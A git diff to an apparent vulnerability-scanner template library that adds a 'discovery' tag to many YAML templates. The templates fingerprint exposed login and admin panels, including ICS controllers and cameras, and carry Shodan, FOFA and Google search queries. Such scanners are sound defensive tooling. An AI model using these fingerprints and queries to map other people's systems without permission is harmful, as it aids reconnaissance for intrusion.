a/http/exposed-panels/amprion-gridloss-panel.yaml +++ b/http/exposed-panels/amprion-gridloss-panel.yaml @@ -1,5 +1,5 @@ -id: amprion-gridloss-panel - +id: amprion-gridloss-panel + info: name: Amprion Grid Loss Login Panel - Detect author: righettod @@ -11,24 +11,24 @@ info: metadata: verified: true max-request: 1 - tags: panel,amprion,login,detect + tags: panel,amprion,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}/config/public" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(to_lower(body), "amprion") && contains(to_lower(body), "grid loss")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: +http: + - method: GET + path: + - "{{BaseURL}}/config/public" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(to_lower(body), "amprion") && contains(to_lower(body), "grid loss")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - '"envTitle":"([A-Z0-9a-z]+)"' # digest: 4a0a004730450220645755d305151124442670ea49bd343ba31d3ed0e88f2a9b81fff670c5ea8f8402210095afa6ae1994e363d5ca20da899c9f0c8319d3cb2859d495bc1adc7a5ab03a38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/anaqua-login-panel.yaml b/http/exposed-panels/anaqua-login-panel.yaml index ec2600a94d1..0dbc767c786 100644 --- a/http/exposed-panels/anaqua-login-panel.yaml +++ b/http/exposed-panels/anaqua-login-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: title:"Anaqua User Sign On"" - tags: anaqua,login,panel + tags: anaqua,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/ansible-semaphore-panel.yaml b/http/exposed-panels/ansible-semaphore-panel.yaml index 6bd39280dc3..3a8dbac40ff 100644 --- a/http/exposed-panels/ansible-semaphore-panel.yaml +++ b/http/exposed-panels/ansible-semaphore-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.html:"Semaphore" product: ansible_semaphore vendor: ansible-semaphore - tags: panel,ansible,semaphore,cicd,oss + tags: panel,ansible,semaphore,cicd,oss,discovery http: - method: GET diff --git a/http/exposed-panels/ansible-tower-exposure.yaml b/http/exposed-panels/ansible-tower-exposure.yaml index 5ab551f381b..b8cf72178cc 100644 --- a/http/exposed-panels/ansible-tower-exposure.yaml +++ b/http/exposed-panels/ansible-tower-exposure.yaml @@ -23,7 +23,7 @@ info: - intitle:"Ansible Tower" - intitle:"ansible tower" fofa-query: title="ansible tower" - tags: panel,ansible,redhat + tags: panel,ansible,redhat,discovery http: - method: GET diff --git a/http/exposed-panels/apache-jmeter-dashboard.yaml b/http/exposed-panels/apache-jmeter-dashboard.yaml index e9ff09e60ee..b38b2f04a71 100644 --- a/http/exposed-panels/apache-jmeter-dashboard.yaml +++ b/http/exposed-panels/apache-jmeter-dashboard.yaml @@ -19,7 +19,7 @@ info: - http.title:"apache jmeter dashboard" fofa-query: title="apache jmeter dashboard" google-query: intitle:"apache jmeter dashboard" - tags: apache,jmeter,panel + tags: apache,jmeter,panel,discovery http: - method: GET diff --git a/http/exposed-panels/apache/apache-apisix-panel.yaml b/http/exposed-panels/apache/apache-apisix-panel.yaml index 2138f37cc46..a636e08d199 100644 --- a/http/exposed-panels/apache/apache-apisix-panel.yaml +++ b/http/exposed-panels/apache/apache-apisix-panel.yaml @@ -17,7 +17,7 @@ info: - title="apache apisix dashboard" shodan-query: http.title:"apache apisix dashboard" google-query: intitle:"apache apisix dashboard" - tags: apache,apisix,panel,login,detect + tags: apache,apisix,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/apache/apache-apollo-panel.yaml b/http/exposed-panels/apache/apache-apollo-panel.yaml index 5894a419fea..de619c12fef 100644 --- a/http/exposed-panels/apache/apache-apollo-panel.yaml +++ b/http/exposed-panels/apache/apache-apollo-panel.yaml @@ -12,7 +12,7 @@ info: vendor: apache product: activemq_apollo shodan-query: title:"Apache Apollo" - tags: panel,apache,apollo,login,detect + tags: panel,apache,apollo,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/apache/apache-mesos-panel.yaml b/http/exposed-panels/apache/apache-mesos-panel.yaml index b53e227c86c..cc3d40380d8 100644 --- a/http/exposed-panels/apache/apache-mesos-panel.yaml +++ b/http/exposed-panels/apache/apache-mesos-panel.yaml @@ -22,7 +22,7 @@ info: - app="apache-mesos" - title="mesos" google-query: intitle:"mesos" - tags: panel,apache,mesos + tags: panel,apache,mesos,discovery http: - method: GET diff --git a/http/exposed-panels/apache/apache-mod-cluster-exposure.yaml b/http/exposed-panels/apache/apache-mod-cluster-exposure.yaml index e5b92446792..e325e1de31d 100644 --- a/http/exposed-panels/apache/apache-mod-cluster-exposure.yaml +++ b/http/exposed-panels/apache/apache-mod-cluster-exposure.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 3 - tags: apache,mod_proxy,cluster,exposure + tags: apache,mod_proxy,cluster,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/apache/public-tomcat-manager.yaml b/http/exposed-panels/apache/public-tomcat-manager.yaml index c6a127f9ca4..53a7ef5f245 100644 --- a/http/exposed-panels/apache/public-tomcat-manager.yaml +++ b/http/exposed-panels/apache/public-tomcat-manager.yaml @@ -22,7 +22,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: panel,tomcat,apache + tags: panel,tomcat,apache,discovery http: - method: GET diff --git a/http/exposed-panels/aperio-eslidemanager-panel.yaml b/http/exposed-panels/aperio-eslidemanager-panel.yaml index 80f9b0482ad..295cbecdaaf 100644 --- a/http/exposed-panels/aperio-eslidemanager-panel.yaml +++ b/http/exposed-panels/aperio-eslidemanager-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"eSlideManager - Login" - tags: aperio,eslidemanager,login,panel + tags: aperio,eslidemanager,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/apex-central-panel.yaml b/http/exposed-panels/apex-central-panel.yaml index d24d18a541e..9d7ec3d6153 100644 --- a/http/exposed-panels/apex-central-panel.yaml +++ b/http/exposed-panels/apex-central-panel.yaml @@ -8,7 +8,7 @@ info: TrendMicro Apex Central Login Panel was discovered.. metadata: max-request: 1 - tags: panel,trendmicro,login + tags: panel,trendmicro,login,discovery http: - method: GET diff --git a/http/exposed-panels/apigee-panel.yaml b/http/exposed-panels/apigee-panel.yaml index 6448b06125e..6606070e34f 100644 --- a/http/exposed-panels/apigee-panel.yaml +++ b/http/exposed-panels/apigee-panel.yaml @@ -1,5 +1,5 @@ -id: apigee-panel - +id: apigee-panel + info: name: Apigee Login Panel - Detect author: righettod @@ -12,24 +12,24 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:"-839356603" - tags: panel,apigee,login + tags: panel,apigee,login,discovery -http: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(body, "Apigee", "content=\"Apigee")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(body, "<title>Apigee", "content=\"Apigee")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - 'Version:?\s+([0-9.]+)' # digest: 4b0a00483046022100f2a0d381ef502512c825a437261a6b79415986b67209ed771095a3d171b1cd51022100ff4344e716c869bd7702387f903aafa6e89ba012dbc182307c7c213d58d150b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/apiman-panel.yaml b/http/exposed-panels/apiman-panel.yaml index c33500d3ed3..ecce89ecdad 100644 --- a/http/exposed-panels/apiman-panel.yaml +++ b/http/exposed-panels/apiman-panel.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,apiman + tags: panel,apiman,discovery http: - method: GET diff --git a/http/exposed-panels/appsmith-web-login.yaml b/http/exposed-panels/appsmith-web-login.yaml index 35df43a8819..f2c5aa5d2a4 100644 --- a/http/exposed-panels/appsmith-web-login.yaml +++ b/http/exposed-panels/appsmith-web-login.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.title:"appsmith" fofa-query: title="appsmith" google-query: intitle:"appsmith" - tags: panel,appsmith + tags: panel,appsmith,discovery http: - method: GET diff --git a/http/exposed-panels/appspace-panel.yaml b/http/exposed-panels/appspace-panel.yaml index e263477b4b2..d9c06704cc6 100644 --- a/http/exposed-panels/appspace-panel.yaml +++ b/http/exposed-panels/appspace-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"appspace" fofa-query: title="appspace" google-query: intitle:"appspace" - tags: appspace,panel,detect + tags: appspace,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/appsuite-panel.yaml b/http/exposed-panels/appsuite-panel.yaml index c5f541462be..c5ef6f60980 100644 --- a/http/exposed-panels/appsuite-panel.yaml +++ b/http/exposed-panels/appsuite-panel.yaml @@ -15,7 +15,7 @@ info: - html:"Appsuite" - http.html:"appsuite" fofa-query: body="appsuite" - tags: panel,appsuite,detect,open-xchange + tags: panel,appsuite,detect,open-xchange,discovery http: - method: GET diff --git a/http/exposed-panels/appwrite-panel.yaml b/http/exposed-panels/appwrite-panel.yaml index 1170b6b74bd..1b6de10ce9a 100644 --- a/http/exposed-panels/appwrite-panel.yaml +++ b/http/exposed-panels/appwrite-panel.yaml @@ -21,7 +21,7 @@ info: - icon_hash=-633108100 - title="sign in - appwrite" google-query: intitle:"sign in - appwrite" - tags: panel,appwrite,detect + tags: panel,appwrite,detect,discovery http: - method: GET diff --git a/http/exposed-panels/aptus-panel.yaml b/http/exposed-panels/aptus-panel.yaml index 3a4b5238253..054af03d86d 100644 --- a/http/exposed-panels/aptus-panel.yaml +++ b/http/exposed-panels/aptus-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"Aptus Login" product: aptus vendor: intelliantech - tags: panel,aptus + tags: panel,aptus,discovery http: - method: GET diff --git a/http/exposed-panels/aqua-enterprise-panel.yaml b/http/exposed-panels/aqua-enterprise-panel.yaml index 5d2622cc10d..10993fceb1b 100644 --- a/http/exposed-panels/aqua-enterprise-panel.yaml +++ b/http/exposed-panels/aqua-enterprise-panel.yaml @@ -16,7 +16,7 @@ info: max-request: 1 shodan-query: http.title:"Aqua Enterprise" || http.title:"Aqua Cloud Native Security Platform" google-query: intitle:"Aqua Cloud Native Security Platform" - tags: panel,aqua,aquasec + tags: panel,aqua,aquasec,discovery http: - method: GET diff --git a/http/exposed-panels/arangodb-web-Interface.yaml b/http/exposed-panels/arangodb-web-Interface.yaml index b902754e3d5..57dbb66328a 100644 --- a/http/exposed-panels/arangodb-web-Interface.yaml +++ b/http/exposed-panels/arangodb-web-Interface.yaml @@ -20,7 +20,7 @@ info: - http.title:"arangodb web interface" fofa-query: title="arangodb web interface" google-query: intitle:"arangodb web interface" - tags: panel,arangodb,login + tags: panel,arangodb,login,discovery http: - method: GET diff --git a/http/exposed-panels/arcgis/arcgis-panel.yaml b/http/exposed-panels/arcgis/arcgis-panel.yaml index a4587f7b49f..a8ec3a89555 100644 --- a/http/exposed-panels/arcgis/arcgis-panel.yaml +++ b/http/exposed-panels/arcgis/arcgis-panel.yaml @@ -14,7 +14,7 @@ info: max-request: 1 vendor: esri product: arcgis_enterprise - tags: docs,arcgis,cms,panel,esri + tags: docs,arcgis,cms,panel,esri,discovery http: - method: GET diff --git a/http/exposed-panels/arcgis/arcgis-services.yaml b/http/exposed-panels/arcgis/arcgis-services.yaml index 66602900a98..6087647da8f 100644 --- a/http/exposed-panels/arcgis/arcgis-services.yaml +++ b/http/exposed-panels/arcgis/arcgis-services.yaml @@ -19,7 +19,7 @@ info: - http.title:"arcgis" fofa-query: title="arcgis" google-query: intitle:"arcgis" - tags: panel,arcgis,rest,api,detect,esri + tags: panel,arcgis,rest,api,detect,esri,discovery http: - method: GET diff --git a/http/exposed-panels/archibus-webcentral-panel.yaml b/http/exposed-panels/archibus-webcentral-panel.yaml index 3a0b12c6e57..3d4313827a2 100644 --- a/http/exposed-panels/archibus-webcentral-panel.yaml +++ b/http/exposed-panels/archibus-webcentral-panel.yaml @@ -18,7 +18,7 @@ info: product: web_central shodan-query: http.favicon.hash:889652940 fofa-query: icon_hash=889652940 - tags: panel,archibus + tags: panel,archibus,discovery http: - method: GET diff --git a/http/exposed-panels/arcserve-panel.yaml b/http/exposed-panels/arcserve-panel.yaml index 69ff0e66e81..6aca5c42c1e 100644 --- a/http/exposed-panels/arcserve-panel.yaml +++ b/http/exposed-panels/arcserve-panel.yaml @@ -18,7 +18,7 @@ info: - http.favicon.hash:-1889244460 - http.favicon.hash:"-1889244460" fofa-query: icon_hash="-1889244460" - tags: panel,login,arcserve,detect + tags: panel,login,arcserve,detect,discovery http: - method: GET diff --git a/http/exposed-panels/argocd-login.yaml b/http/exposed-panels/argocd-login.yaml index 2b3734de806..20334ed598d 100644 --- a/http/exposed-panels/argocd-login.yaml +++ b/http/exposed-panels/argocd-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"Argo CD" product: argo_cd vendor: argoproj - tags: panel,argocd,login,kubernetes + tags: panel,argocd,login,kubernetes,discovery http: - method: GET diff --git a/http/exposed-panels/arris-modem-detect.yaml b/http/exposed-panels/arris-modem-detect.yaml index b0650678729..4e3220f2235 100644 --- a/http/exposed-panels/arris-modem-detect.yaml +++ b/http/exposed-panels/arris-modem-detect.yaml @@ -18,7 +18,7 @@ info: - html:"phy.htm" - http.html:"phy.htm" fofa-query: body="phy.htm" - tags: panel,arris,commscope + tags: panel,arris,commscope,discovery http: - method: GET diff --git a/http/exposed-panels/aspcms-backend-panel.yaml b/http/exposed-panels/aspcms-backend-panel.yaml index 4c3a903748a..6b08def12a1 100644 --- a/http/exposed-panels/aspcms-backend-panel.yaml +++ b/http/exposed-panels/aspcms-backend-panel.yaml @@ -16,7 +16,7 @@ info: vendor: asp4cms product: aspcms fofa-query: app="ASPCMS" - tags: panel,login,aspcms,admin + tags: panel,login,aspcms,admin,discovery http: - raw: diff --git a/http/exposed-panels/aspect-control-panel.yaml b/http/exposed-panels/aspect-control-panel.yaml index 2f2ccf617c6..483c73a9565 100644 --- a/http/exposed-panels/aspect-control-panel.yaml +++ b/http/exposed-panels/aspect-control-panel.yaml @@ -21,7 +21,7 @@ info: - http.html:'src="libjs/pngfix.js"' product: aspect-ent-256 vendor: abb - tags: detect,panel,aspect,login,abb,ics + tags: detect,panel,aspect,login,abb,ics,discovery http: - method: GET diff --git a/http/exposed-panels/asus-aicloud-panel.yaml b/http/exposed-panels/asus-aicloud-panel.yaml index 565df83e5c0..aa16ae76aa7 100644 --- a/http/exposed-panels/asus-aicloud-panel.yaml +++ b/http/exposed-panels/asus-aicloud-panel.yaml @@ -11,7 +11,7 @@ info: verified: "true" max-request: 1 shodan-query: title:"AiCloud" - tags: panel,asus,aicloud,detect + tags: panel,asus,aicloud,detect,discovery http: - method: GET diff --git a/http/exposed-panels/asus-router-panel.yaml b/http/exposed-panels/asus-router-panel.yaml index 7a864c2350e..d58defb9f75 100644 --- a/http/exposed-panels/asus-router-panel.yaml +++ b/http/exposed-panels/asus-router-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: 'Server: httpd/2.0 port:8080' product: rt-n53 vendor: asus - tags: panel,asus,router,iot + tags: panel,asus,router,iot,discovery http: - method: GET diff --git a/http/exposed-panels/atlantis-detect.yaml b/http/exposed-panels/atlantis-detect.yaml index 191438c0049..93f32fac9b1 100644 --- a/http/exposed-panels/atlantis-detect.yaml +++ b/http/exposed-panels/atlantis-detect.yaml @@ -18,7 +18,7 @@ info: product: atlantis shodan-query: http.favicon.hash:-1706783005 fofa-query: icon_hash=-1706783005 - tags: panel,atlantis,runatlantis + tags: panel,atlantis,runatlantis,discovery http: - method: GET diff --git a/http/exposed-panels/atlassian-bamboo-panel.yaml b/http/exposed-panels/atlassian-bamboo-panel.yaml index d4f2035ee0f..a38ff35f3fa 100644 --- a/http/exposed-panels/atlassian-bamboo-panel.yaml +++ b/http/exposed-panels/atlassian-bamboo-panel.yaml @@ -16,7 +16,7 @@ info: vendor: atlassian product: bamboo shodan-query: http.title:"Bamboo" - tags: panel,bamboo,login,detect + tags: panel,bamboo,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/atlassian-crowd-panel.yaml b/http/exposed-panels/atlassian-crowd-panel.yaml index e1b28ad7c9f..e785d84c44c 100644 --- a/http/exposed-panels/atlassian-crowd-panel.yaml +++ b/http/exposed-panels/atlassian-crowd-panel.yaml @@ -16,7 +16,7 @@ info: product: crowd category: sso shodan-query: http.component:"atlassian jira" - tags: panel,atlassian + tags: panel,atlassian,discovery http: - method: GET diff --git a/http/exposed-panels/atvise-login.yaml b/http/exposed-panels/atvise-login.yaml index f950924defc..80766c47ce4 100644 --- a/http/exposed-panels/atvise-login.yaml +++ b/http/exposed-panels/atvise-login.yaml @@ -16,7 +16,7 @@ info: max-request: 1 product: atvise vendor: bachmann - tags: panel,atvise,edb + tags: panel,atvise,edb,discovery http: - method: GET diff --git a/http/exposed-panels/audiobookshelf-panel.yaml b/http/exposed-panels/audiobookshelf-panel.yaml index eb1ca6bbee2..ecf626723a5 100644 --- a/http/exposed-panels/audiobookshelf-panel.yaml +++ b/http/exposed-panels/audiobookshelf-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: title:"Audiobookshelf" product: audiobookshelf vendor: audiobookshelf - tags: panel,audiobookshelf,detect + tags: panel,audiobookshelf,detect,discovery http: - method: GET diff --git a/http/exposed-panels/audiocodes-detect.yaml b/http/exposed-panels/audiocodes-detect.yaml index c20b2dd461f..491f3fe1cb1 100644 --- a/http/exposed-panels/audiocodes-detect.yaml +++ b/http/exposed-panels/audiocodes-detect.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.html:"Audiocodes" product: 420hd_ip_phone_firmware vendor: audiocodes - tags: panel,audiocodes + tags: panel,audiocodes,discovery http: - method: GET diff --git a/http/exposed-panels/authelia-panel.yaml b/http/exposed-panels/authelia-panel.yaml index c9017b81501..0805de519a7 100644 --- a/http/exposed-panels/authelia-panel.yaml +++ b/http/exposed-panels/authelia-panel.yaml @@ -17,7 +17,7 @@ info: vendor: authelia product: authelia shodan-query: title:"Login - Authelia" - tags: login,panel,authelia + tags: login,panel,authelia,discovery http: - method: GET diff --git a/http/exposed-panels/authentik-panel.yaml b/http/exposed-panels/authentik-panel.yaml index 66b007690b9..b5b91265572 100644 --- a/http/exposed-panels/authentik-panel.yaml +++ b/http/exposed-panels/authentik-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-178113786 - tags: authentik,sso,mfa,panel,detect + tags: authentik,sso,mfa,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/automatisch-panel.yaml b/http/exposed-panels/automatisch-panel.yaml index cc7b37f4de2..48f7c63b377 100644 --- a/http/exposed-panels/automatisch-panel.yaml +++ b/http/exposed-panels/automatisch-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 shodan-query: title:"Automatisch" - tags: panel,automatisch,detect + tags: panel,automatisch,detect,discovery http: - method: GET diff --git a/http/exposed-panels/autoset-detect.yaml b/http/exposed-panels/autoset-detect.yaml index 082b3089885..7a90f58e0b9 100644 --- a/http/exposed-panels/autoset-detect.yaml +++ b/http/exposed-panels/autoset-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"AutoSet" - tags: tech,php,autoset,apache,panel + tags: tech,php,autoset,apache,panel,discovery http: - method: GET diff --git a/http/exposed-panels/avantfax-panel.yaml b/http/exposed-panels/avantfax-panel.yaml index 7c7d19c31a1..954d0892e0c 100644 --- a/http/exposed-panels/avantfax-panel.yaml +++ b/http/exposed-panels/avantfax-panel.yaml @@ -20,7 +20,7 @@ info: - http.title:"avantfax - login" fofa-query: title="avantfax - login" google-query: intitle:"avantfax - login" - tags: panel,avantfax,login + tags: panel,avantfax,login,discovery http: - method: GET diff --git a/http/exposed-panels/avatier-password-management.yaml b/http/exposed-panels/avatier-password-management.yaml index 5d6a589e934..6458cbee38d 100644 --- a/http/exposed-panels/avatier-password-management.yaml +++ b/http/exposed-panels/avatier-password-management.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:983734701 - tags: edb,panel,avatier,aims + tags: edb,panel,avatier,aims,discovery http: - method: GET diff --git a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml index 37e8eba2b91..9cb907d800f 100644 --- a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: avaya product: aura_communication_manager - tags: panel,avaya + tags: panel,avaya,discovery http: - method: GET diff --git a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml index 8fee5843bca..f500371e2ce 100644 --- a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: avaya product: aura_system_manager - tags: panel,avaya + tags: panel,avaya,discovery http: - method: GET diff --git a/http/exposed-panels/aviatrix-panel.yaml b/http/exposed-panels/aviatrix-panel.yaml index f3fbb1dec04..ec8d90df6c4 100644 --- a/http/exposed-panels/aviatrix-panel.yaml +++ b/http/exposed-panels/aviatrix-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"aviatrix cloud controller" fofa-query: title="aviatrix cloud controller" google-query: intitle:"aviatrix cloud controller" - tags: panel,aviatrix + tags: panel,aviatrix,discovery http: - method: GET diff --git a/http/exposed-panels/avigilon-panel.yaml b/http/exposed-panels/avigilon-panel.yaml index b0181d0b77b..ad605d75698 100644 --- a/http/exposed-panels/avigilon-panel.yaml +++ b/http/exposed-panels/avigilon-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"login - avigilon control center" fofa-query: title="login - avigilon control center" google-query: intitle:"login - avigilon control center" - tags: panel,avigilon + tags: panel,avigilon,discovery http: - method: GET diff --git a/http/exposed-panels/avtech-avn801-camera-panel.yaml b/http/exposed-panels/avtech-avn801-camera-panel.yaml index 92eba48bec8..abc1a7016f0 100644 --- a/http/exposed-panels/avtech-avn801-camera-panel.yaml +++ b/http/exposed-panels/avtech-avn801-camera-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: title:"login" product:"Avtech AVN801 network camera" - tags: panel,avtech,iot,camera + tags: panel,avtech,iot,camera,discovery http: - method: GET diff --git a/http/exposed-panels/avtech-dvr-exposure.yaml b/http/exposed-panels/avtech-dvr-exposure.yaml index dca1ff8aac6..4d46ec27e6a 100644 --- a/http/exposed-panels/avtech-dvr-exposure.yaml +++ b/http/exposed-panels/avtech-dvr-exposure.yaml @@ -9,7 +9,7 @@ info: - http://www.avtech.com.tw/ metadata: max-request: 1 - tags: dvr,exposure,avtech,panel + tags: dvr,exposure,avtech,panel,discovery http: - method: GET diff --git a/http/exposed-panels/aws-ec2-autoscale.yaml b/http/exposed-panels/aws-ec2-autoscale.yaml index 13d0f5abeea..9c15e4688c9 100644 --- a/http/exposed-panels/aws-ec2-autoscale.yaml +++ b/http/exposed-panels/aws-ec2-autoscale.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"AWS EC2 Auto Scaling Lab" - tags: exposure,ec2,aws,amazon,panel + tags: exposure,ec2,aws,amazon,panel,discovery http: - method: GET diff --git a/http/exposed-panels/aws-opensearch-login.yaml b/http/exposed-panels/aws-opensearch-login.yaml index 9785956b581..a15a3b017b4 100644 --- a/http/exposed-panels/aws-opensearch-login.yaml +++ b/http/exposed-panels/aws-opensearch-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: amazon product: opensearch - tags: panel,opensearch,aws,amazon + tags: panel,opensearch,aws,amazon,discovery http: - method: GET diff --git a/http/exposed-panels/axel-webserver.yaml b/http/exposed-panels/axel-webserver.yaml index 18684242e61..dd5e2dbff05 100644 --- a/http/exposed-panels/axel-webserver.yaml +++ b/http/exposed-panels/axel-webserver.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: http.title:"Axel" fofa-query: app="AxelWebServer" - tags: panel,axel,webserver + tags: panel,axel,webserver,discovery http: - method: GET diff --git a/http/exposed-panels/axigen-webadmin.yaml b/http/exposed-panels/axigen-webadmin.yaml index 9654ab05faf..d51e442b2c4 100644 --- a/http/exposed-panels/axigen-webadmin.yaml +++ b/http/exposed-panels/axigen-webadmin.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"Axigen WebAdmin" product: axigen_mail_server vendor: axigen - tags: axigen,panel + tags: axigen,panel,discovery http: - method: GET diff --git a/http/exposed-panels/axigen-webmail.yaml b/http/exposed-panels/axigen-webmail.yaml index c47bd38998c..67bedc56539 100644 --- a/http/exposed-panels/axigen-webmail.yaml +++ b/http/exposed-panels/axigen-webmail.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"Axigen WebMail" product: axigen_mail_server vendor: axigen - tags: axigen,panel + tags: axigen,panel,discovery http: - method: GET diff --git a/http/exposed-panels/axway-api-manager-panel.yaml b/http/exposed-panels/axway-api-manager-panel.yaml index 76a7f5d8dfb..b6746a6f530 100644 --- a/http/exposed-panels/axway-api-manager-panel.yaml +++ b/http/exposed-panels/axway-api-manager-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Axway API Manager Login" - tags: panel,axway,detect,login + tags: panel,axway,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/axway-securetransport-panel.yaml b/http/exposed-panels/axway-securetransport-panel.yaml index de6c4feb37b..bcb9b3f3ff1 100644 --- a/http/exposed-panels/axway-securetransport-panel.yaml +++ b/http/exposed-panels/axway-securetransport-panel.yaml @@ -27,7 +27,7 @@ info: fofa-query: - title="securetransport" || http.favicon.hash:1330269434 - title="st web client" - tags: panel,axway,securetransport + tags: panel,axway,securetransport,discovery http: - method: GET diff --git a/http/exposed-panels/axway-securetransport-webclient.yaml b/http/exposed-panels/axway-securetransport-webclient.yaml index 09edc12508f..58ace8001a4 100644 --- a/http/exposed-panels/axway-securetransport-webclient.yaml +++ b/http/exposed-panels/axway-securetransport-webclient.yaml @@ -26,7 +26,7 @@ info: fofa-query: - title="securetransport" || http.favicon.hash:1330269434 - title="st web client" - tags: panel,axway,securetransport,webclient + tags: panel,axway,securetransport,webclient,discovery http: - method: GET diff --git a/http/exposed-panels/axxon-client-panel.yaml b/http/exposed-panels/axxon-client-panel.yaml index beccdce24b8..ed5c296fec2 100644 --- a/http/exposed-panels/axxon-client-panel.yaml +++ b/http/exposed-panels/axxon-client-panel.yaml @@ -21,7 +21,7 @@ info: - http.title:"axxon next client" fofa-query: title="axxon next client" google-query: intitle:"axxon next client" - tags: panel,axxon,vms,login,detect,axxonsoft + tags: panel,axxon,vms,login,detect,axxonsoft,discovery http: - method: GET diff --git a/http/exposed-panels/azkaban-web-client.yaml b/http/exposed-panels/azkaban-web-client.yaml index 3a3f003b224..c9844c6e98e 100644 --- a/http/exposed-panels/azkaban-web-client.yaml +++ b/http/exposed-panels/azkaban-web-client.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"Azkaban Web Client" product: azkaban vendor: azkaban_project - tags: panel,azkaban + tags: panel,azkaban,discovery http: - method: GET diff --git a/http/exposed-panels/backpack/backpack-admin-panel.yaml b/http/exposed-panels/backpack/backpack-admin-panel.yaml index 7b8485b2fa7..a76a6b58099 100644 --- a/http/exposed-panels/backpack/backpack-admin-panel.yaml +++ b/http/exposed-panels/backpack/backpack-admin-panel.yaml @@ -16,7 +16,7 @@ info: verified: true product: backpack\\\\crud vendor: backpackforlaravel - tags: panel,backpack,admin + tags: panel,backpack,admin,discovery http: - method: GET diff --git a/http/exposed-panels/barracuda-message-panel.yaml b/http/exposed-panels/barracuda-message-panel.yaml index 42d12066807..71a3cb25aa0 100644 --- a/http/exposed-panels/barracuda-message-panel.yaml +++ b/http/exposed-panels/barracuda-message-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:1436966696 http.html:"/css/archiver.css" - tags: barracuda,panel,login + tags: barracuda,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/barracuda-panel.yaml b/http/exposed-panels/barracuda-panel.yaml index 03c898f0a87..88892c3e063 100644 --- a/http/exposed-panels/barracuda-panel.yaml +++ b/http/exposed-panels/barracuda-panel.yaml @@ -9,7 +9,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: barracuda,panel,vpn + tags: barracuda,panel,vpn,discovery http: - method: GET diff --git a/http/exposed-panels/bazarr-login.yaml b/http/exposed-panels/bazarr-login.yaml index 86bd292f17f..23fa7ad77e9 100644 --- a/http/exposed-panels/bazarr-login.yaml +++ b/http/exposed-panels/bazarr-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,bazarr,login + tags: panel,bazarr,login,discovery http: - method: GET diff --git a/http/exposed-panels/bedita-panel.yaml b/http/exposed-panels/bedita-panel.yaml index 2074a857097..ee54ffddb24 100644 --- a/http/exposed-panels/bedita-panel.yaml +++ b/http/exposed-panels/bedita-panel.yaml @@ -20,7 +20,7 @@ info: - http.title:"bedita" fofa-query: title="bedita" google-query: intitle:"bedita" - tags: panel,bedita + tags: panel,bedita,discovery http: - method: GET diff --git a/http/exposed-panels/beego-admin-dashboard.yaml 